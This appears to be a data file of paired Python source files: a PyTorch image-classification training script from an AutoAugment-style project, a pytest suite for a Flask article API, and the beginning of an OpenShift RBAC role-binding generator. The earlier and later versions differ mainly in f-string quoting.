scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda x: 0.97 ** int((x + C.get()['lr_schedule']['warmup']['epoch']) / 2.4))
else:
raise ValueError('invalid lr_schduler=%s' % lr_scheduler_type)
if C.get()['lr_schedule'].get('warmup', None) and C.get()['lr_schedule']['warmup']['epoch'] > 0:
scheduler = GradualWarmupScheduler(
optimizer,
multiplier=C.get()['lr_schedule']['warmup']['multiplier'],
total_epoch=C.get()['lr_schedule']['warmup']['epoch'],
after_scheduler=scheduler
)
if not tag or not is_master:
from AdapAug.metrics import SummaryWriterDummy as SummaryWriter
logger.warning('tag not provided, no tensorboard log.')
else:
from tensorboardX import SummaryWriter
writers = [SummaryWriter(log_dir='./logs/%s/%s' % (tag, x)) for x in ['train', 'valid', 'test']]
if C.get()['optimizer']['ema'] > 0.0 and is_master:
# https://discuss.pytorch.org/t/how-to-apply-exponential-moving-average-decay-for-variables/10856/4?u=ildoonet
ema = EMA(C.get()['optimizer']['ema'])
else:
ema = None
result = OrderedDict()
epoch_start = 1
if save_path != 'test.pth': # and is_master: --> should load all data(not able to be broadcasted)
if save_path and os.path.exists(save_path):
logger.info('%s file found. loading...' % save_path)
data = torch.load(save_path)
key = 'model' if 'model' in data else 'state_dict'
if 'epoch' not in data:
model.load_state_dict(data)
else:
logger.info('checkpoint epoch@%d' % data['epoch'])
if not isinstance(model, (DataParallel, DistributedDataParallel)):
model.load_state_dict({k.replace('module.', ''): v for k, v in data[key].items()})
else:
model.load_state_dict({k if 'module.' in k else 'module.'+k: v for k, v in data[key].items()})
logger.info('optimizer.load_state_dict+')
if 'optimizer' in data:
optimizer.load_state_dict(data['optimizer'])
if data['epoch'] < C.get()['epoch']:
epoch_start = data['epoch']
else:
only_eval = True
if ema is not None:
ema.shadow = data.get('ema', {}) if isinstance(data.get('ema', {}), dict) else data['ema'].state_dict()
del data
else:
logger.info('"%s" file not found. skip to pretrain weights...' % save_path)
if only_eval:
logger.warning('model checkpoint not found. only-evaluation mode is off.')
only_eval = False
if local_rank >= 0:
for name, x in model.state_dict().items():
dist.broadcast(x, 0)
logger.info(f'multinode init. local_rank={dist.get_rank()} is_master={is_master}')
torch.cuda.synchronize()
tqdm_disabled = bool(os.environ.get('TASK_NAME', '')) and local_rank != 0 # KakaoBrain Environment
if only_eval:
logger.info('evaluation only+')
model.eval()
rs = dict()
with torch.no_grad():
rs['train'] = run_epoch(model, trainloader, criterion, None, desc_default='train', epoch=0, writer=writers[0], is_master=is_master, data_parallel=data_parallel)
rs['valid'] = run_epoch(model, validloader, criterion, None, desc_default='valid', epoch=0, writer=writers[1], is_master=is_master, data_parallel=data_parallel)
rs['test'] = run_epoch(model, testloader_, criterion, None, desc_default='*test', epoch=0, writer=writers[2], is_master=is_master, data_parallel=data_parallel)
if ema is not None and len(ema) > 0:
model_ema.load_state_dict({k.replace('module.', ''): v for k, v in ema.state_dict().items()})
rs['valid'] = run_epoch(model_ema, validloader, criterion_ce, None, desc_default='valid(EMA)', epoch=0, writer=writers[1], verbose=is_master, tqdm_disabled=tqdm_disabled)
rs['test'] = run_epoch(model_ema, testloader_, criterion_ce, None, desc_default='*test(EMA)', epoch=0, writer=writers[2], verbose=is_master, tqdm_disabled=tqdm_disabled)
for key, setname in itertools.product(['loss', 'top1', 'top5'], ['train', 'valid', 'test']):
if setname not in rs:
continue
result['%s_%s' % (key, setname)] = rs[setname][key]
result['epoch'] = 0
return result
# train loop
best_top1 = 0
for epoch in range(epoch_start, max_epoch + 1):
if local_rank >= 0:
trainsampler.set_epoch(epoch)
model.train()
rs = dict()
rs['train'] = run_epoch(model, trainloader, criterion, optimizer, desc_default='train', epoch=epoch, writer=writers[0], verbose=is_master, scheduler=scheduler, ema=ema, wd=C.get()['optimizer']['decay'], tqdm_disabled=tqdm_disabled, data_parallel=data_parallel)
model.eval()
if math.isnan(rs['train']['loss']):
raise Exception('train loss is NaN.')
if ema is not None and C.get()['optimizer']['ema_interval'] > 0 and epoch % C.get()['optimizer']['ema_interval'] == 0:
logger.info(f'ema synced+ rank={dist.get_rank()}')
if ema is not None:
model.load_state_dict(ema.state_dict())
for name, x in model.state_dict().items():
# print(name)
dist.broadcast(x, 0)
torch.cuda.synchronize()
logger.info(f'ema synced- rank={dist.get_rank()}')
if is_master and (epoch % evaluation_interval == 0 or epoch == max_epoch):
with torch.no_grad():
rs['valid'] = run_epoch(model, validloader, criterion_ce, None, desc_default='valid', epoch=epoch, writer=writers[1], verbose=is_master, tqdm_disabled=tqdm_disabled, data_parallel=data_parallel)
rs['test'] = run_epoch(model, testloader_, criterion_ce, None, desc_default='*test', epoch=epoch, writer=writers[2], verbose=is_master, tqdm_disabled=tqdm_disabled, data_parallel=data_parallel)
if ema is not None:
model_ema.load_state_dict({k.replace('module.', ''): v for k, v in ema.state_dict().items()})
rs['valid'] = run_epoch(model_ema, validloader, criterion_ce, None, desc_default='valid(EMA)', epoch=epoch, writer=writers[1], verbose=is_master, tqdm_disabled=tqdm_disabled)
rs['test'] = run_epoch(model_ema, testloader_, criterion_ce, None, desc_default='*test(EMA)', epoch=epoch, writer=writers[2], verbose=is_master, tqdm_disabled=tqdm_disabled)
logger.info(
f'epoch={epoch} '
f'[train] loss={rs['train']['loss']:.4f} top1={rs['train']['top1']:.4f} '
f'[valid] loss={rs['valid']['loss']:.4f} top1={rs['valid']['top1']:.4f} '
f'[test] loss={rs['test']['loss']:.4f} top1={rs['test']['top1']:.4f} '
)
if metric == 'last' or rs[metric]['top1'] > best_top1:
if metric != 'last':
best_top1 = rs[metric]['top1']
for key, setname in itertools.product(['loss', 'top1', 'top5'], ['train', 'valid', 'test']):
result['%s_%s' % (key, setname)] = rs[setname][key]
result['epoch'] = epoch
writers[1].add_scalar('valid_top1/best', rs['valid']['top1'], epoch)
writers[2].add_scalar('test_top1/best', rs['test']['top1'], epoch)
reporter(
loss_valid=rs['valid']['loss'], top1_valid=rs['valid']['top1'],
loss_test=rs['test']['loss'], top1_test=rs['test']['top1']
)
# save checkpoint
if is_master and save_path and epoch_start != max_epoch:
logger.info('save model@%d to %s, err=%.4f' % (epoch, save_path, 1 - best_top1))
torch.save({
'epoch': epoch,
'log': {
'train': rs['train'].get_dict(),
'valid': rs['valid'].get_dict(),
'test': rs['test'].get_dict(),
},
'optimizer': optimizer.state_dict(),
'model': model.state_dict(),
'ema': ema.state_dict() if ema is not None else None,
}, save_path)
if gr_dist is not None:
gr_ids = m.sample().numpy()
trainsampler, trainloader, validloader, testloader_ = get_dataloaders(dataset, C.get()['batch'], dataroot, test_ratio, split_idx=cv_fold, multinode=(local_rank >= 0), gr_assign=gr_assign, gr_ids=gr_ids)
del model
# result['top1_test'] = best_top1
return result
if __name__ == '__main__':
parser = ConfigArgumentParser(conflict_handler='resolve')
parser.add_argument('--tag', type=str, default='')
parser.add_argument('--dataroot', type=str, default='/data/private/pretrainedmodels', help='torchvision data folder')
parser.add_argument('--save', type=str, default='test.pth')
parser.add_argument('--cv-ratio', type=float, default=0.0)
parser.add_argument('--cv', type=int, default=0)
parser.add_argument('--local_rank', type=int, default=-1)
parser.add_argument('--evaluation-interval', type=int, default=5)
parser.add_argument('--only-eval', action='store_true')
args = parser.parse_args()
assert (args.only_eval and args.save) or not args.only_eval, 'checkpoint path not provided in evaluation mode.'
if not args.only_eval:
if args.save:
logger.info('checkpoint will be saved at %s' % args.save)
else:
logger.warning('Provide --save argument to save the checkpoint. Without it, training result will not be saved!')
import time
t = time.time()
result = train_and_eval(args.tag, args.dataroot, test_ratio=args.cv_ratio, cv_fold=args.cv, save_path=args.save, only_eval=args.only_eval, local_rank=args.local_rank, metric='test', evaluation_interval=args.evaluation_interval)
elapsed = time.time() - t
logger.info('done.')
logger.info('model: %s' % C.get()['model'])
logger.info('augmentation: %s' % C.get()['aug'])
logger.info('\n' + json.dumps(result, indent=4))
logger.info('elapsed time: %.3f Hours' % (elapsed / 3600.))
logger.info('top1 error in testset: %.4f' % (1. - result['top1_test']))
logger.info(args.save)
| import pathlib
import sys
sys.path.append(str(pathlib.Path(__file__).parent.parent.absolute()))
import itertools
import json
import logging
import math
import os
from collections import OrderedDict
import torch
from torch.distributions import Categorical
from torch import nn, optim
from torch.nn.parallel.data_parallel import DataParallel
from torch.nn.parallel import DistributedDataParallel
import torch.distributed as dist
from torchvision import transforms
from tqdm import tqdm
from theconf import Config as C, ConfigArgumentParser
from AdapAug.common import get_logger, EMA, add_filehandler
from AdapAug.data import get_dataloaders, Augmentation, CutoutDefault
from AdapAug.lr_scheduler import adjust_learning_rate_resnet
from AdapAug.metrics import accuracy, Accumulator, CrossEntropyLabelSmooth, Tracker
from AdapAug.networks import get_model, num_class
from AdapAug.tf_port.rmsprop import RMSpropTF
from AdapAug.aug_mixup import CrossEntropyMixUpLabelSmooth, mixup
from warmup_scheduler import GradualWarmupScheduler
import random, copy, numpy as np
logger = get_logger('Fast AutoAugment')
logger.setLevel(logging.INFO)
_CIFAR_MEAN, _CIFAR_STD = (0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)
def run_epoch(model, loader, loss_fn, optimizer, desc_default='', epoch=0, writer=None, verbose=1, scheduler=None, is_master=True, ema=None, wd=0.0, tqdm_disabled=False, \
data_parallel=False, trace=False, batch_multiplier=1, get_trace=[]):
if data_parallel:
model = DataParallel(model).cuda()
if verbose:
loader = tqdm(loader, disable=tqdm_disabled)
loader.set_description('[%s %04d/%04d]' % (desc_default, epoch, C.get()['epoch']))
params_without_bn = [params for name, params in model.named_parameters() if not ('_bn' in name or '.bn' in name)]
loss_ema = None
metrics = Accumulator()
if trace or batch_multiplier > 1:
tracker = Tracker()
cnt = 0
total_steps = len(loader)
steps = 0
for data, label in loader:
steps += 1
if isinstance(data, list):
data, clean_data, log_prob, policy = data
if batch_multiplier > 1:
log_prob = torch.cat([ log_prob[:,m] for m in range(batch_multiplier) ]) # [batch, M] -> [batch*M]
policy = torch.cat([ policy[:,m] for m in range(batch_multiplier) ]) # [batch, M, n_subpolicy, n_op, 3] -> [batch*M, n_subpolicy, n_op, 3]
clean_label = label.detach()
if batch_multiplier > 1:
data = torch.cat([ data[:,m] for m in range(batch_multiplier) ])
label = label.repeat(batch_multiplier)
data, label = data.cuda(), label.cuda()
if C.get().conf.get('mixup', 0.0) <= 0.0 or optimizer is None:
preds = model(data)
loss = loss_fn(preds, label)
else: # mixup
data, targets, shuffled_targets, lam = mixup(data, label, C.get()['mixup'])
preds = model(data)
loss = loss_fn(preds, targets, shuffled_targets, lam)
del shuffled_targets, lam
if 'clean_loss' in get_trace or 'clean_logits' in get_trace:
with torch.no_grad():
clean_logits = model(clean_data.cuda())
if 'clean_loss' in get_trace:
clean_loss = loss_fn(clean_logits, clean_label.cuda()).cpu().detach()
if trace or batch_multiplier > 1:
_loss = loss.cpu().detach()
loss = loss.mean()
if optimizer:
loss += wd * (1. / 2.) * sum([torch.sum(p ** 2) for p in params_without_bn])
loss.backward()
grad_clip = C.get()['optimizer'].get('clip', 5.0)
if grad_clip > 0:
nn.utils.clip_grad_norm_(model.parameters(), grad_clip)
optimizer.step()
optimizer.zero_grad()
if ema is not None:
ema(model, (epoch - 1) * total_steps + steps)
top1, top5 = accuracy(preds, label, (1, 5))
metrics.add_dict({
'loss': loss.item() * len(data),
'top1': top1.item() * len(data),
'top5': top5.item() * len(data),
})
cnt += len(data)
if trace:
tracker.add_dict({
'cnt': len(data),
'clean_data': (clean_data.cpu().detach(), clean_label.cpu()),
'log_probs': log_prob.cpu().detach(),
'policy': policy.cpu().detach(),
'loss': _loss,
'acc': top1.item(),
})
del log_prob, policy, _loss, clean_data, clean_label
if 'clean_loss' in get_trace:
tracker.add('clean_loss', clean_loss)
del clean_loss
if 'logits' in get_trace:
tracker.add('logits', preds.cpu().detach())
if 'clean_logits' in get_trace:
tracker.add('clean_logits', clean_logits.cpu().detach())
elif batch_multiplier > 1:
tracker.add_dict({
'cnt': len(data),
'loss': _loss,
# 'acc': top1.item(),
})
del _loss
if loss_ema:
loss_ema = loss_ema * 0.9 + loss.item() * 0.1
else:
loss_ema = loss.item()
if verbose:
postfix = metrics / cnt
if optimizer:
postfix['lr'] = optimizer.param_groups[0]['lr']
postfix['loss_ema'] = loss_ema
loader.set_postfix(postfix)
if scheduler is not None:
scheduler.step(epoch - 1 + float(steps) / total_steps)
del preds, loss, top1, top5, data, label
if tqdm_disabled and verbose:
if optimizer:
logger.info('[%s %03d/%03d] %s lr=%.6f', desc_default, epoch, C.get()['epoch'], metrics / cnt, optimizer.param_groups[0]['lr'])
else:
logger.info('[%s %03d/%03d] %s', desc_default, epoch, C.get()['epoch'], metrics / cnt)
metrics /= cnt
if optimizer:
metrics.metrics['lr'] = optimizer.param_groups[0]['lr']
if verbose:
for key, value in metrics.items():
writer.add_scalar(key, value, epoch)
if trace or batch_multiplier > 1:
return tracker, metrics
return metrics
def train_and_eval(tag, dataloaders, dataroot, test_ratio=0.0, cv_fold=0, reporter=None, metric='last', save_path=None, only_eval=False, local_rank=-1, evaluation_interval=5, reduced=False, gr_assign=None, gr_dist=None, data_parallel=False):
total_batch = C.get()["batch"]
if test_ratio == 0. and 'test_dataset' in C.get().conf:
dataset = C.get()['test_dataset']
else:
dataset = C.get()["dataset"]
if dataloaders:
trainsampler, trainloader, validloader, testloader_ = dataloaders
else:
if gr_dist is not None:
m = Categorical(gr_dist)
gr_ids = m.sample().numpy()
else:
gr_ids = None
trainsampler, trainloader, validloader, testloader_ = get_dataloaders(dataset, C.get()['batch'], dataroot, test_ratio, split_idx=cv_fold, multinode=(local_rank >= 0), gr_assign=gr_assign, gr_ids=gr_ids)
if local_rank >= 0:
dist.init_process_group(backend='nccl', init_method='env://', world_size=int(os.environ['WORLD_SIZE']))
device = torch.device('cuda', local_rank)
torch.cuda.set_device(device)
C.get()['lr'] *= dist.get_world_size()
logger.info(f'local batch={C.get()["batch"]} world_size={dist.get_world_size()} ----> total batch={C.get()["batch"] * dist.get_world_size()}')
total_batch = C.get()["batch"] * dist.get_world_size()
is_master = local_rank < 0 or dist.get_rank() == 0
if is_master:
add_filehandler(logger, save_path + '.log')
if not reporter:
reporter = lambda **kwargs: 0
max_epoch = C.get()['epoch']
# create a model & an optimizer
model = get_model(C.get()['model'], num_class(dataset), local_rank=local_rank)
model_ema = get_model(C.get()['model'], num_class(dataset), local_rank=-1)
model_ema.eval()
criterion_ce = criterion = CrossEntropyLabelSmooth(num_class(dataset), C.get().conf.get('lb_smooth', 0))
if C.get().conf.get('mixup', 0.0) > 0.0:
criterion = CrossEntropyMixUpLabelSmooth(num_class(dataset), C.get().conf.get('lb_smooth', 0))
if C.get()['optimizer']['type'] == 'sgd':
optimizer = optim.SGD(
model.parameters(),
lr=C.get()['lr'],
momentum=C.get()['optimizer'].get('momentum', 0.9),
weight_decay=0.0,
nesterov=C.get()['optimizer'].get('nesterov', True)
)
elif C.get()['optimizer']['type'] == 'rmsprop':
optimizer = RMSpropTF(
model.parameters(),
lr=C.get()['lr'],
weight_decay=0.0,
alpha=0.9, momentum=0.9,
eps=0.001
)
else:
raise ValueError('invalid optimizer type=%s' % C.get()['optimizer']['type'])
lr_scheduler_type = C.get()['lr_schedule'].get('type', 'cosine')
if lr_scheduler_type == 'cosine':
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=C.get()['epoch'], eta_min=0.)
elif lr_scheduler_type == 'resnet':
scheduler = adjust_learning_rate_resnet(optimizer)
elif lr_scheduler_type == 'efficientnet':
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda x: 0.97 ** int((x + C.get()['lr_schedule']['warmup']['epoch']) / 2.4))
else:
raise ValueError('invalid lr_schduler=%s' % lr_scheduler_type)
if C.get()['lr_schedule'].get('warmup', None) and C.get()['lr_schedule']['warmup']['epoch'] > 0:
scheduler = GradualWarmupScheduler(
optimizer,
multiplier=C.get()['lr_schedule']['warmup']['multiplier'],
total_epoch=C.get()['lr_schedule']['warmup']['epoch'],
after_scheduler=scheduler
)
if not tag or not is_master:
from AdapAug.metrics import SummaryWriterDummy as SummaryWriter
logger.warning('tag not provided, no tensorboard log.')
else:
from tensorboardX import SummaryWriter
writers = [SummaryWriter(log_dir='./logs/%s/%s' % (tag, x)) for x in ['train', 'valid', 'test']]
if C.get()['optimizer']['ema'] > 0.0 and is_master:
# https://discuss.pytorch.org/t/how-to-apply-exponential-moving-average-decay-for-variables/10856/4?u=ildoonet
ema = EMA(C.get()['optimizer']['ema'])
else:
ema = None
result = OrderedDict()
epoch_start = 1
if save_path != 'test.pth': # and is_master: --> should load all data(not able to be broadcasted)
if save_path and os.path.exists(save_path):
logger.info('%s file found. loading...' % save_path)
data = torch.load(save_path)
key = 'model' if 'model' in data else 'state_dict'
if 'epoch' not in data:
model.load_state_dict(data)
else:
logger.info('checkpoint epoch@%d' % data['epoch'])
if not isinstance(model, (DataParallel, DistributedDataParallel)):
model.load_state_dict({k.replace('module.', ''): v for k, v in data[key].items()})
else:
model.load_state_dict({k if 'module.' in k else 'module.'+k: v for k, v in data[key].items()})
logger.info('optimizer.load_state_dict+')
if 'optimizer' in data:
optimizer.load_state_dict(data['optimizer'])
if data['epoch'] < C.get()['epoch']:
epoch_start = data['epoch']
else:
only_eval = True
if ema is not None:
ema.shadow = data.get('ema', {}) if isinstance(data.get('ema', {}), dict) else data['ema'].state_dict()
del data
else:
logger.info('"%s" file not found. skip to pretrain weights...' % save_path)
if only_eval:
logger.warning('model checkpoint not found. only-evaluation mode is off.')
only_eval = False
if local_rank >= 0:
for name, x in model.state_dict().items():
dist.broadcast(x, 0)
logger.info(f'multinode init. local_rank={dist.get_rank()} is_master={is_master}')
torch.cuda.synchronize()
tqdm_disabled = bool(os.environ.get('TASK_NAME', '')) and local_rank != 0 # KakaoBrain Environment
if only_eval:
logger.info('evaluation only+')
model.eval()
rs = dict()
with torch.no_grad():
rs['train'] = run_epoch(model, trainloader, criterion, None, desc_default='train', epoch=0, writer=writers[0], is_master=is_master, data_parallel=data_parallel)
rs['valid'] = run_epoch(model, validloader, criterion, None, desc_default='valid', epoch=0, writer=writers[1], is_master=is_master, data_parallel=data_parallel)
rs['test'] = run_epoch(model, testloader_, criterion, None, desc_default='*test', epoch=0, writer=writers[2], is_master=is_master, data_parallel=data_parallel)
if ema is not None and len(ema) > 0:
model_ema.load_state_dict({k.replace('module.', ''): v for k, v in ema.state_dict().items()})
rs['valid'] = run_epoch(model_ema, validloader, criterion_ce, None, desc_default='valid(EMA)', epoch=0, writer=writers[1], verbose=is_master, tqdm_disabled=tqdm_disabled)
rs['test'] = run_epoch(model_ema, testloader_, criterion_ce, None, desc_default='*test(EMA)', epoch=0, writer=writers[2], verbose=is_master, tqdm_disabled=tqdm_disabled)
for key, setname in itertools.product(['loss', 'top1', 'top5'], ['train', 'valid', 'test']):
if setname not in rs:
continue
result['%s_%s' % (key, setname)] = rs[setname][key]
result['epoch'] = 0
return result
# train loop
best_top1 = 0
for epoch in range(epoch_start, max_epoch + 1):
if local_rank >= 0:
trainsampler.set_epoch(epoch)
model.train()
rs = dict()
rs['train'] = run_epoch(model, trainloader, criterion, optimizer, desc_default='train', epoch=epoch, writer=writers[0], verbose=is_master, scheduler=scheduler, ema=ema, wd=C.get()['optimizer']['decay'], tqdm_disabled=tqdm_disabled, data_parallel=data_parallel)
model.eval()
if math.isnan(rs['train']['loss']):
raise Exception('train loss is NaN.')
if ema is not None and C.get()['optimizer']['ema_interval'] > 0 and epoch % C.get()['optimizer']['ema_interval'] == 0:
logger.info(f'ema synced+ rank={dist.get_rank()}')
if ema is not None:
model.load_state_dict(ema.state_dict())
for name, x in model.state_dict().items():
# print(name)
dist.broadcast(x, 0)
torch.cuda.synchronize()
logger.info(f'ema synced- rank={dist.get_rank()}')
if is_master and (epoch % evaluation_interval == 0 or epoch == max_epoch):
with torch.no_grad():
rs['valid'] = run_epoch(model, validloader, criterion_ce, None, desc_default='valid', epoch=epoch, writer=writers[1], verbose=is_master, tqdm_disabled=tqdm_disabled, data_parallel=data_parallel)
rs['test'] = run_epoch(model, testloader_, criterion_ce, None, desc_default='*test', epoch=epoch, writer=writers[2], verbose=is_master, tqdm_disabled=tqdm_disabled, data_parallel=data_parallel)
if ema is not None:
model_ema.load_state_dict({k.replace('module.', ''): v for k, v in ema.state_dict().items()})
rs['valid'] = run_epoch(model_ema, validloader, criterion_ce, None, desc_default='valid(EMA)', epoch=epoch, writer=writers[1], verbose=is_master, tqdm_disabled=tqdm_disabled)
rs['test'] = run_epoch(model_ema, testloader_, criterion_ce, None, desc_default='*test(EMA)', epoch=epoch, writer=writers[2], verbose=is_master, tqdm_disabled=tqdm_disabled)
logger.info(
f'epoch={epoch} '
f'[train] loss={rs["train"]["loss"]:.4f} top1={rs["train"]["top1"]:.4f} '
f'[valid] loss={rs["valid"]["loss"]:.4f} top1={rs["valid"]["top1"]:.4f} '
f'[test] loss={rs["test"]["loss"]:.4f} top1={rs["test"]["top1"]:.4f} '
)
if metric == 'last' or rs[metric]['top1'] > best_top1:
if metric != 'last':
best_top1 = rs[metric]['top1']
for key, setname in itertools.product(['loss', 'top1', 'top5'], ['train', 'valid', 'test']):
result['%s_%s' % (key, setname)] = rs[setname][key]
result['epoch'] = epoch
writers[1].add_scalar('valid_top1/best', rs['valid']['top1'], epoch)
writers[2].add_scalar('test_top1/best', rs['test']['top1'], epoch)
reporter(
loss_valid=rs['valid']['loss'], top1_valid=rs['valid']['top1'],
loss_test=rs['test']['loss'], top1_test=rs['test']['top1']
)
# save checkpoint
if is_master and save_path and epoch_start != max_epoch:
logger.info('save model@%d to %s, err=%.4f' % (epoch, save_path, 1 - best_top1))
torch.save({
'epoch': epoch,
'log': {
'train': rs['train'].get_dict(),
'valid': rs['valid'].get_dict(),
'test': rs['test'].get_dict(),
},
'optimizer': optimizer.state_dict(),
'model': model.state_dict(),
'ema': ema.state_dict() if ema is not None else None,
}, save_path)
if gr_dist is not None:
gr_ids = m.sample().numpy()
trainsampler, trainloader, validloader, testloader_ = get_dataloaders(dataset, C.get()['batch'], dataroot, test_ratio, split_idx=cv_fold, multinode=(local_rank >= 0), gr_assign=gr_assign, gr_ids=gr_ids)
del model
# result['top1_test'] = best_top1
return result
if __name__ == '__main__':
parser = ConfigArgumentParser(conflict_handler='resolve')
parser.add_argument('--tag', type=str, default='')
parser.add_argument('--dataroot', type=str, default='/data/private/pretrainedmodels', help='torchvision data folder')
parser.add_argument('--save', type=str, default='test.pth')
parser.add_argument('--cv-ratio', type=float, default=0.0)
parser.add_argument('--cv', type=int, default=0)
parser.add_argument('--local_rank', type=int, default=-1)
parser.add_argument('--evaluation-interval', type=int, default=5)
parser.add_argument('--only-eval', action='store_true')
args = parser.parse_args()
assert (args.only_eval and args.save) or not args.only_eval, 'checkpoint path not provided in evaluation mode.'
if not args.only_eval:
if args.save:
logger.info('checkpoint will be saved at %s' % args.save)
else:
logger.warning('Provide --save argument to save the checkpoint. Without it, training result will not be saved!')
import time
t = time.time()
result = train_and_eval(args.tag, args.dataroot, test_ratio=args.cv_ratio, cv_fold=args.cv, save_path=args.save, only_eval=args.only_eval, local_rank=args.local_rank, metric='test', evaluation_interval=args.evaluation_interval)
elapsed = time.time() - t
logger.info('done.')
logger.info('model: %s' % C.get()['model'])
logger.info('augmentation: %s' % C.get()['aug'])
logger.info('\n' + json.dumps(result, indent=4))
logger.info('elapsed time: %.3f Hours' % (elapsed / 3600.))
logger.info('top1 error in testset: %.4f' % (1. - result['top1_test']))
logger.info(args.save)
|
import json
import pathlib
import pytest
import requests
from jsonschema import RefResolver, validate
from pytest_intro.app import app
from pytest_intro.models import Article
@pytest.fixture
def client():
app.config["TESTING"] = True
with app.test_client() as client:
yield client
def validate_payload(payload, schema_name):
"""
Validate payload with selected schema
"""
schemas_dir = str(f"{pathlib.Path(__file__).parent.absolute()}/schemas")
schema = json.loads(pathlib.Path(f"{schemas_dir}/{schema_name}").read_text())
validate(
payload,
schema,
resolver=RefResolver(
"file://" + str(pathlib.Path(f"{schemas_dir}/{schema_name}").absolute()),
schema, # it's used to resolve file: inside schemas correctly
),
)
def test_create_article(client):
"""
GIVEN request data for new article
WHEN endpoint /create-article/ is called
THEN it should return Article in json format matching schema
"""
data = {
"author": "john@doe.com",
"title": "New Article",
"content": "Some extra awesome content",
}
response = client.post(
"/create-article/",
data=json.dumps(data),
content_type="application/json",
)
validate_payload(response.json, "Article.json")
def test_get_article(client):
"""
GIVEN ID of article stored in the database
WHEN endpoint /article/<id-of-article>/ is called
THEN it should return Article in json format matching schema
"""
article = Article(
author="jane@doe.com",
title="New Article",
content="Super extra awesome article",
).save()
response = client.get(
f"/article/{article.id}/",
content_type="application/json",
)
validate_payload(response.json, "Article.json")
def test_list_articles(client):
"""
GIVEN articles stored in the database
WHEN endpoint /article-list/ is called
THEN it should return list of Article in json format matching schema
"""
Article(
author="jane@doe.com",
title="New Article",
content="Super extra awesome article",
).save()
response = client.get(
"/article-list/",
content_type="application/json",
)
validate_payload(response.json, "ArticleList.json")
@pytest.mark.e2e
def test_create_list_get(client):
"""
GIVEN we successfully create an article
WHEN we fetch all articles
THEN should be able to fetch the article created initially
"""
requests.post(
"http://localhost:5000/create-article/",
json={
"author": "john@doe.com",
"title": "New Article",
"content": "Some extra awesome content",
},
)
response = requests.get(
"http://localhost:5000/article-list/",
)
articles = response.json()
response = requests.get(
f'http://localhost:5000/article/{articles[0]['id']}/',
)
assert response.status_code == 200
@pytest.mark.parametrize(
"data",
[
{
"author": "John Doe",
"title": "New Article",
"content": "Some extra awesome content",
},
{
"author": "John Doe",
"title": "New Article",
},
{"author": "John Doe", "title": None, "content": "Some extra awesome content"},
],
)
def test_create_article_bad_request(client, data):
"""
GIVEN request data with invalid values or missing attributes
WHEN endpoint /create-article/ is called
THEN it should return status 400 and JSON body
"""
response = client.post(
"/create-article/",
data=json.dumps(data),
content_type="application/json",
)
assert response.status_code == 400
assert response.json is not None
| import json
import pathlib
import pytest
import requests
from jsonschema import RefResolver, validate
from pytest_intro.app import app
from pytest_intro.models import Article
@pytest.fixture
def client():
app.config["TESTING"] = True
with app.test_client() as client:
yield client
def validate_payload(payload, schema_name):
"""
Validate payload with selected schema
"""
schemas_dir = str(f"{pathlib.Path(__file__).parent.absolute()}/schemas")
schema = json.loads(pathlib.Path(f"{schemas_dir}/{schema_name}").read_text())
validate(
payload,
schema,
resolver=RefResolver(
"file://" + str(pathlib.Path(f"{schemas_dir}/{schema_name}").absolute()),
schema, # it's used to resolve file: inside schemas correctly
),
)
def test_create_article(client):
"""
GIVEN request data for new article
WHEN endpoint /create-article/ is called
THEN it should return Article in json format matching schema
"""
data = {
"author": "john@doe.com",
"title": "New Article",
"content": "Some extra awesome content",
}
response = client.post(
"/create-article/",
data=json.dumps(data),
content_type="application/json",
)
validate_payload(response.json, "Article.json")
def test_get_article(client):
"""
GIVEN ID of article stored in the database
WHEN endpoint /article/<id-of-article>/ is called
THEN it should return Article in json format matching schema
"""
article = Article(
author="jane@doe.com",
title="New Article",
content="Super extra awesome article",
).save()
response = client.get(
f"/article/{article.id}/",
content_type="application/json",
)
validate_payload(response.json, "Article.json")
def test_list_articles(client):
"""
GIVEN articles stored in the database
WHEN endpoint /article-list/ is called
THEN it should return list of Article in json format matching schema
"""
Article(
author="jane@doe.com",
title="New Article",
content="Super extra awesome article",
).save()
response = client.get(
"/article-list/",
content_type="application/json",
)
validate_payload(response.json, "ArticleList.json")
@pytest.mark.e2e
def test_create_list_get(client):
"""
GIVEN we successfully create an article
WHEN we fetch all articles
THEN should be able to fetch the article created initially
"""
requests.post(
"http://localhost:5000/create-article/",
json={
"author": "john@doe.com",
"title": "New Article",
"content": "Some extra awesome content",
},
)
response = requests.get(
"http://localhost:5000/article-list/",
)
articles = response.json()
response = requests.get(
f'http://localhost:5000/article/{articles[0]["id"]}/',
)
assert response.status_code == 200
@pytest.mark.parametrize(
"data",
[
{
"author": "John Doe",
"title": "New Article",
"content": "Some extra awesome content",
},
{
"author": "John Doe",
"title": "New Article",
},
{"author": "John Doe", "title": None, "content": "Some extra awesome content"},
],
)
def test_create_article_bad_request(client, data):
"""
GIVEN request data with invalid values or missing attributes
WHEN endpoint /create-article/ is called
THEN it should return status 400 and JSON body
"""
response = client.post(
"/create-article/",
data=json.dumps(data),
content_type="application/json",
)
assert response.status_code == 400
assert response.json is not None
|
def add_imagestream_namespace_rbac(gendoc):
resources = gendoc
context = gendoc.context
puller_subjects = []
if not context.private:
puller_subjects.append({
'apiGroup': 'rbac.authorization.k8s.io',
'kind': 'Group',
'name': 'system:authenticated'
})
else:
puller_subjects.append({
'apiGroup': 'rbac.authorization.k8s.io',
'kind': 'Group',
'name': 'openshift-priv-admins'
})
puller_subjects.append({
'apiGroup': 'rbac.authorization.k8s.io',
'kind': 'Group',
'name': 'qe'
})
puller_subjects.append({
'apiGroup': 'rbac.authorization.k8s.io',
'kind': 'Group',
'name': 'release-team'
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1beta1',
'kind': 'RoleBinding',
'metadata': {
'name': 'image-puller',
'namespace': context.is_namespace
},
'roleRef': {
'apiGroup': 'rbac.authorization.k8s.io',
'kind': 'ClusterRole',
'name': 'system:image-puller'
},
'subjects': puller_subjects,
})
resources.append({
'apiVersion': 'rbac.authorization.k8s.io/v1beta1',
'kind': 'RoleBinding',
'metadata': {
'name': 'user-viewer',
'namespace': context.is_namespace
},
'roleRef': {
'apiGroup': 'rbac.authorization.k8s.io',
'kind': 'ClusterRole',
'name': 'view'
},
'subjects': puller_subjects,
})
resources.append({
'apiVersion': 'authorization.openshift.io/v1',
'kind': 'Role',
'metadata': {
